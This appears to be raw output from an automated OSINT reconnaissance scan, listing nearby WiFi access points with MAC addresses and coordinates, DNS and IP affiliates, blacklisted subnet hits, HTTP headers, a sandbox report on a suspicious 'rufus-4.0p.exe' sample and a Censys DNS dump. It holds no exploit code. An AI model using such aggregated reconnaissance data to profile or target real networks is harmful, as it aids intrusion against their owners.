| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Sitecom90F1C4 (Net ID: 00:0C:F6:90:F1:C4) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-B962 (Net ID: 00:1D:D5:BA:B9:60) | 32.8608, -79.9746 |
| 2023-05-12 02:44:31 | Affiliate - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.com | cdn-185-199-111-153.github.com |
| 2023-05-12 03:01:23 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.212): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | NotLakehouse (Net ID: 00:0C:41:6F:1D:BC) | 39.0469, -77.4903 |
| 2023-05-12 03:09:03 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.104 | 87.248.157.102 |
| 2023-05-12 03:01:28 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.22): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.42): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | RossAviation206 (Net ID: 00:0C:42:6C:BE:A6) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cf-ray: 7c5f60715ea2423d-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:46:21 | Netblock Membership | No | RIPE | 8 | 0 | 2 | 0 | None | 185.199.110.0/24 | 185.199.110.153 |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-004
(Net ID: 00:04:E2:F4:8A:F5) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wagmound (Net ID: 00:01:71:0A:16:DF) | 52.3759, 4.8975 |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.230): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:13:10 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [james-gamboa.github.io]
https://www.openphish.com/feed.txt | james-gamboa.github.io |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 410HowardStudios (Net ID: 00:02:2D:00:25:63) | 37.780462,-122.390564 |
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.174): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | suddenlink.net-2AD2 (Net ID: 90:1A:CA:7E:2A:D0) | 37.751, -97.822 |
| 2023-05-12 02:55:01 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 188.114.96.1:80 | 188.114.96.1 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | downtown7 (Net ID: 00:01:E3:DE:06:3F) | 50.1188, 8.6843 |
| 2023-05-12 02:53:19 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-58693743083355784', u'signatures': [], u'threat_level': 1, u'size': 1411144, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'sha512': u'dc93938623bfb168b27fbe2475df1838b75b6655fa8816c058f64c8dd7803679e7bab7c8b5da07f2eb9436da2e84973253e7509def261f0f7dcb638684769eba', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'6455a98ae3cb0ab470017f93', u'created_at': u'2023-05-06T01:12:42+00:00', u'filename': u'bounty-58693743083355784'}, {u'url': None, u'submission_id': u'6455a98a5a7739690c0ed96f', u'created_at': u'2023-05-06T01:12:42+00:00', u'filename': u'bounty-42554279808800971'}], u'analysis_start_time': u'2023-05-06T01:12:42+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'3855aaa9b3c3632acee05508966072c0', u'network_mode': u'default', u'processes': [], u'sha1': u'f165233f7d4ac46b1150eef6e9d1ff16d2b496a0', u'url_analysis': False, u'type': u'PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'suspicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'64bits', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [{u'file_process_pid': 6884, u'filename': u'00000000-00006884.00000000.78323.8EB30000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\rufus-4.0p.exe', u'flags': u'00000040', u'file_process_sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'address': u'8EB30000', u'verdict': u'suspicious', u'file_process': u'rufus-4.0p.exe'}, {u'file_process_pid': 6884, u'filename': u'00000000-00006884.00000000.78323.B850F000.00000040.mdmp', u'file_process_disc_pathway': u'Z:\\rufus-4.0p.exe', u'flags': u'00000040', u'file_process_sha256': u'bfecf4dcf1a63d8b64b900906102edf666642316291c9bba42eb0fb9c7bccbd6', u'address': u'B850F000', u'verdict': u'suspicious', u'file_process': u'rufus-4.0p.exe'}], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': 39, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': 4, u'submit_name': u'rufus-4.0p.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-SYNCH-L1-2-0" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-FIBERS-L1-1-1" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-LOCALIZATION-L1-2-1" at base 8b1c0000\n "rufus-4.0p.exe" loaded module "KERNEL32" at base 8c1f0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\TEMP\\VXOLE64.DLL" at base 781f0000\n "rufus-4.0p.exe" loaded module "KERNEL32.DLL" at base 8c1f0000\n "rufus-4.0p.exe" loaded module "ADVAPI32.DLL" at base 8ea00000\n "rufus-4.0p.exe" loaded module "COMCTL32.DLL" at base 7b8b0000\n "rufus-4.0p.exe" loaded module "COMDLG32.DLL" at base 8c940000\n "rufus-4.0p.exe" loaded module "CRYPT32.DLL" at base 8afa0000\n "rufus-4.0p.exe" loaded module "GDI32.DLL" at base 8c910000\n "rufus-4.0p.exe" loaded module "MSVCRT.DLL" at base 8cd50000\n "rufus-4.0p.exe" loaded module "OLE32.DLL" at base 8c0a0000\n "rufus-4.0p.exe" loaded module "SETUPAPI.DLL" at base 8c420000\n "rufus-4.0p.exe" loaded module "SHELL32.DLL" at base 8d5c0000\n "rufus-4.0p.exe" loaded module "SHLWAPI.DLL" at base 8c3c0000\n "rufus-4.0p.exe" loaded module "USER32.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "RPCRT4.DLL" at base 8c2a0000\n "rufus-4.0p.exe" loaded module "SSPICLI.DLL" at base 8ad90000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\WINTRUST.DLL" at base 8af40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\CRYPT32.DLL" at base 8afa0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\RSAENH.DLL" at base 8a2d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\BCRYPTPRIMITIVES.DLL" at base 8bd40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\UXTHEME.DLL" at base 894d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\VDS_PS.DLL" at base 7b1a0000\n "rufus-4.0p.exe" loaded module "RICHED20" at base 6ee00000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\GPEDIT.DLL" at base 6ec40000\n "rufus-4.0p.exe" loaded module "COMCTL32" at base 7b8b0000\n "rufus-4.0p.exe" loaded module "OLEAUT32.DLL" at base 83960000\n "rufus-4.0p.exe" loaded module "EXT-MS-WIN-RTCORE-NTUSER-WINDOW-EXT-L1-1-0.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "EXT-MS-WIN-RTCORE-NTUSER-INTEGRATION-L1-1-0.DLL" at base 8cbc0000\n "rufus-4.0p.exe" loaded module "API-MS-WIN-CORE-COM-L1-1-0.DLL" at base 8ceb0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\MSCTF.DLL" at base 8ca50000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\OLE32.DLL" at base 8c0a0000\n "rufus-4.0p.exe" loaded module "WININET" at base 7b4d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\ICONCODECSERVICE.DLL" at base 81ad0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\OLEACC.DLL" at base 78c40000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\EXPLORERFRAME.DLL" at base 76790000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NETPROFM.DLL" at base 87ef0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NPMPROXY.DLL" at base 85820000\n "rufus-4.0p.exe" loaded module "ONDEMANDCONNROUTEHELPER.DLL" at base 6f650000\n "rufus-4.0p.exe" loaded module "WINHTTP.DLL" at base 854f0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\ONDEMANDCONNROUTEHELPER.DLL" at base 6f650000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\MSWSOCK.DLL" at base 8a6c0000\n "rufus-4.0p.exe" loaded module "MSISO.DLL" at base 7e860000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\RASADHLP.DLL" at base 83790000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL" at base 83b90000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\WS2_32" at base 8d550000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\SCHANNEL.DLL" at base 8a210000\n "rufus-4.0p.exe" loaded module "MSKEYPROTECT.DLL" at base 7e020000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\EN-US\\SHELL32.DLL.MUI" at base ffc10000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\CRYPTNET.DLL" at base 7a6d0000\n "rufus-4.0p.exe" loaded module "CRYPTNET.DLL" at base 7a6d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\NCRYPTSSLP.DLL" at base 7e0d0000\n "rufus-4.0p.exe" loaded module "%WINDIR%\\SYSTEM32\\GPEDIT.DLL" at base 6ece0000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" called "LoadLibrary" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter kernel32 (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter KERNEL32.DLL (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter COMCTL32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter comdlg32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter GDI32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter msvcrt.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter ole32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SETUPAPI.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter SHLWAPI.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter USER32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter kernel32.dll (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "LoadLibrary" with a parameter Riched20 (UID: 00000000-00006884)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function addresses', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-4.0p.exe" called "GetProcAddress" with a parameter InitializeCriticalSectionEx (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "GetProcAddress" with a parameter FlsAlloc (UID: 00000000-00006884)\n "rufus-4.0p.exe" called "GetProcAddress" with a parameter FlsSe | 185.199.109.153 |
| 2023-05-12 03:10:01 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | expressdryclean.gr | expressdryclean.gr |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 0 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_4.png | https://pics.battleb0t.xyz/ |
| 2023-05-12 02:54:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | www.ayhu.xyz |
| 2023-05-12 03:00:49 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.69): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:13:49:EC:E1:54) | 40.2024, 29.0398 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cf-ray: 7c5f60483bb94334-EWR | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "REVALIDATED", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"79120efbf2a0b92da044ff91335c99c1\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=FXQU88yRDhEJMx%2FdYM%2F9ZMluhZXagjhG95IApBIpm7WqxobZm4CcFhtwU9d3QdUV9%2BbJoSdd48r6u2FX9%2FKZxhE4%2B1z8sAVQ0tKz2uiNE7MhIPsLxcBIQGzqQ1fObOLwdnHGyXAPA0tM\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:16 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f60483bb94334-EWR"} |
| 2023-05-12 02:44:05 | SSL Certificate - Issued by | No | CertSpotter | 0 | 0 | 1 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | battleb0t.xyz |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5c61b40afd1911-FRA"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 03:01:20 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.183): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SR.Mandant (Net ID: 00:01:21:30:6F:34) | 50.1188, 8.6843 |
| 2023-05-12 02:54:51 | Raw Data from RIRs | No | Censys | 0 | 0 | 3 | 0 | None | {"last_updated_at": "2023-05-12T02:01:01.392Z", "ip": "34.74.170.74", "location_updated_at": "2023-04-30T03:41:24.176126Z", "autonomous_system_updated_at": "2023-04-30T03:41:24.176335Z", "location": {"province": "South Carolina", "city": "North Charleston", "country": "United States", "coordinates": {"latitude": 32.8929, "longitude": -80.0458}, "postal_code": "29418", "country_code": "US", "timezone": "America/New_York", "continent": "North America"}, "dns": {"records": {"beta.overclockedservices.ca": {"record_type": "CNAME", "resolved_at": "2023-05-08T12:59:35.249032044Z"}, "emvitool-dv.ml": {"record_type": "A", "resolved_at": "2022-10-17T22:18:00.338135487Z"}, "nexter.xande.dev": {"record_type": "CNAME", "resolved_at": "2022-10-17T22:45:28.429344531Z"}, "www.mizan.et": {"record_type": "CNAME", "resolved_at": "2023-03-27T23:59:01.371578440Z"}, "asimto.com": {"record_type": "A", "resolved_at": "2022-10-30T19:18:07.454054467Z"}, "emporas.io": {"record_type": "A", "resolved_at": "2022-10-17T22:16:30.071984024Z"}, "boot.signifly.io": {"record_type": "CNAME", "resolved_at": "2023-01-16T15:34:28.059221703Z"}, "definitionof.org": {"record_type": "A", "resolved_at": "2022-12-08T16:38:56.794905095Z"}, "mouadziani.com": {"record_type": "A", "resolved_at": "2023-01-14T13:37:56.766858379Z"}, "www.503.photos": {"record_type": "CNAME", "resolved_at": "2023-03-19T02:42:12.347086287Z"}, "olufunto.dev": {"record_type": "A", "resolved_at": "2022-12-28T14:48:52.916235421Z"}, "www.isaacsonladders.co.za": {"record_type": "CNAME", "resolved_at": "2023-02-21T21:51:52.146614450Z"}, "www.amateurgame.dev": {"record_type": "CNAME", "resolved_at": "2023-04-12T17:03:48.151599978Z"}, "fullstackforhumans.com": {"record_type": "A", "resolved_at": "2023-04-15T14:31:03.542528095Z"}, "joelofran.co": {"record_type": "A", "resolved_at": "2023-05-11T13:09:36.675248006Z"}, "hostarshosting.ml": {"record_type": "A", "resolved_at": "2023-04-04T19:31:01.779774968Z"}, "www.gmimarkets.info": {"record_type": "CNAME", "resolved_at": "2023-05-01T17:10:25.734198185Z"}, "florentpellegrin.com": {"record_type": "A", "resolved_at": "2022-11-22T13:32:20.879316883Z"}, "savemyspot.ca": {"record_type": "A", "resolved_at": "2022-10-03T12:31:57.921314861Z"}, "polite-axolotl-b38d0e.netlify.app": {"record_type": "A", "resolved_at": "2023-01-29T12:06:11.892515081Z"}, "influencer.infectic.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T20:57:25.580100675Z"}, "portal.healthzen.io": {"record_type": "CNAME", "resolved_at": "2022-12-22T03:10:47.307049488Z"}, "sae105.allanhienne.fr": {"record_type": "CNAME", "resolved_at": "2023-01-02T04:54:16.330119990Z"}, "richardvandermeer.nl": {"record_type": "A", "resolved_at": "2023-04-28T21:50:43.119914774Z"}, "charallah.co.uk": {"record_type": "A", "resolved_at": "2022-11-12T16:28:57.037470462Z"}, "ghosttech.com.br": {"record_type": "A", "resolved_at": "2023-04-22T12:32:16.063889700Z"}, "remedialteaching-detoermalijn.nl": {"record_type": "A", "resolved_at": "2023-03-19T17:49:21.649173911Z"}, "benjaminsilver.xyz": {"record_type": "A", "resolved_at": "2022-10-17T21:16:42.890957577Z"}, "davidsullivan.xyz": {"record_type": "A", "resolved_at": "2023-05-05T20:41:16.868140898Z"}, "app.envisageworldwide.com": {"record_type": "CNAME", "resolved_at": "2023-03-12T13:49:14.045850752Z"}, "grab.stoneltd.co.uk": {"record_type": "CNAME", "resolved_at": "2023-02-02T18:36:47.008063426Z"}, "www.fiveicons.com": {"record_type": "CNAME", "resolved_at": "2023-03-22T07:15:59.618749237Z"}, "agustin-dev.me": {"record_type": "A", "resolved_at": "2023-02-08T18:09:39.861263846Z"}, "cwt.hiyield.co.uk": {"record_type": "CNAME", "resolved_at": "2022-12-04T17:29:42.136640068Z"}, "dashboard.styledotme.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T22:45:51.707850435Z"}, "aaa-scaffolding.mctweb.co.uk": {"record_type": "CNAME", "resolved_at": "2022-12-30T17:00:40.939271772Z"}, "l.dcgstaging.co.uk": {"record_type": "CNAME", "resolved_at": "2022-10-17T21:43:36.322757205Z"}, "www.lafabriklocale.fr": {"record_type": "CNAME", "resolved_at": "2022-11-07T14:56:36.811524661Z"}, "www.form2290download.com": {"record_type": "CNAME", "resolved_at": "2022-12-20T13:23:19.027062663Z"}, "hopton.co.uk": {"record_type": "A", "resolved_at": "2023-05-05T20:33:36.106307737Z"}, "kobekoto.com": {"record_type": "A", "resolved_at": "2023-02-14T14:10:07.117039480Z"}, "founders.bemasonic.com": {"record_type": "A", "resolved_at": "2022-10-17T20:38:07.858715677Z"}, "www.kunle.org": {"record_type": "CNAME", "resolved_at": "2022-09-19T22:02:20.340504742Z"}, "nlm.asianlegacylibrary.org": {"record_type": "CNAME", "resolved_at": "2023-03-21T05:49:06.463119331Z"}, "rollinknecht.com": {"record_type": "A", "resolved_at": "2023-03-17T14:52:13.784128416Z"}, "venicehouseyxe.ca": {"record_type": "A", "resolved_at": "2022-12-25T12:28:21.240157263Z"}, "elated-galileo-548c37.netlify.com": {"record_type": "A", "resolved_at": "2023-01-29T13:53:22.914856752Z"}, "foodable.ng": {"record_type": "A", "resolved_at": "2023-02-08T18:51:17.277516369Z"}, "community.livewellandfully.com": {"record_type": "CNAME", "resolved_at": "2022-11-16T13:35:36.116348653Z"}, "timotei.dev": {"record_type": "A", "resolved_at": "2023-03-30T17:27:58.725461848Z"}, "growoil.ng": {"record_type": "A", "resolved_at": "2022-10-17T21:18:12.013899010Z"}, "kpscarwash.com": {"record_type": "A", "resolved_at": "2023-04-25T15:10:32.056226775Z"}, "gli.betdex.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T21:12:53.933298839Z"}, "www.spiritix.co": {"record_type": "CNAME", "resolved_at": "2023-05-01T13:00:42.786069830Z"}, "gas.red-elvis.net": {"record_type": "CNAME", "resolved_at": "2023-05-11T20:03:54.927976191Z"}, "www.heypartner.io": {"record_type": "CNAME", "resolved_at": "2023-02-15T15:32:42.818151384Z"}, "putikiestate.nz": {"record_type": "A", "resolved_at": "2023-01-12T15:47:09.403699644Z"}, "jobhunttracker.live": {"record_type": "A", "resolved_at": "2023-01-25T15:53:38.230367270Z"}, "www.badguyz.net": {"record_type": "CNAME", "resolved_at": "2023-03-24T18:31:11.356367184Z"}, "medallionproject.org": {"record_type": "A", "resolved_at": "2022-11-21T16:04:40.676151940Z"}, "netlify.vinko.me": {"record_type": "CNAME", "resolved_at": "2023-03-22T18:56:03.306053165Z"}, "hotcode.dev": {"record_type": "A", "resolved_at": "2023-03-10T15:02:16.821390522Z"}, "www.pepoparadise.net": {"record_type": "CNAME", "resolved_at": "2022-10-29T16:20:13.892401780Z"}, "jastudio-tech.com": {"record_type": "A", "resolved_at": "2022-12-07T13:44:28.251191198Z"}, "ragavee.com": {"record_type": "A", "resolved_at": "2022-10-17T21:56:14.004368926Z"}, "admin-beta.zurf.tech": {"record_type": "CNAME", "resolved_at": "2023-05-01T20:41:28.477702343Z"}, "laceylink.me": {"record_type": "A", "resolved_at": "2023-03-22T11:44:45.375753652Z"}, "rodandstaff.info": {"record_type": "CNAME", "resolved_at": "2023-03-16T15:26:30.585215504Z"}, "luming.tk": {"record_type": "A", "resolved_at": "2022-10-17T21:10:19.707786943Z"}, "aos-project.org": {"record_type": "A", "resolved_at": "2023-02-02T11:11:17.166518505Z"}, "www.movimentotransformers.org": {"record_type": "CNAME", "resolved_at": "2023-02-25T19:19:23.124662794Z"}, "johnberry.us": {"record_type": "A", "resolved_at": "2023-03-10T18:01:30.474090850Z"}, "flippening.money": {"record_type": "A", "resolved_at": "2022-10-17T22:27:26.279352799Z"}, "www.doers-square.com": {"record_type": "CNAME", "resolved_at": "2022-10-17T21:34:03.727776781Z"}, "onemoreonce.net": {"record_type": "A", "resolved_at": "2023-04-22T18:54:42.143545404Z"}, "www.citycitycountry.co.uk": {"record_type": "CNAME", "resolved_at": "2023-02-10T18:39:58.627886479Z"}, "neybapps.com": {"record_type": "A", "resolved_at": "2023-03-16T02:40:39.987675551Z"}, "www.alanmancemitsubishi.com.au": {"record_type": "CNAME", "resolved_at": "2022-10-17T21:25:52.475796029Z"}, "sythen.co": {"record_type": "A", "resolved_at": "2023-04-14T17:03:23.960203603Z"}, "acasune-portfolio.com": {"record_type": "A", "resolved_at": "2023-02-17T12:55:44.912965443Z"}, "aaa-scaffolding.netlify.app": {"record_type": "A", "resolved_at": "2023-03-16T12:05:42.159923059Z"}, "julia.peklak.net": {"record_type": "CNAME", "resolved_at": "2022-10-17T21:30:20.839012221Z"}, "www.socialprogressindex.net": {"record_type": "CNAME", "resolved_at": "2022-12-26T16:02:37.186092694Z"}, "weatherapp.alecpagliarussi.me": {"record_type": "CNAME", "resolved_at": "2022-10-17T22:44:25.184926620Z"}, "v8.azharlihan.com": {"record_type": "CNAME", "resolved_at": "2022-10-05T19:12:08.840985334Z"}, "www.avfmudancasesfretes.com.br": {"record_type": "A", "resolved_at": "2022-09-28T23:34:15.977879819Z"}, "eliteexecscoaching.com": {"record_type": "A", "resolved_at": "2023-03-29T23:32:37.295202060Z"}, 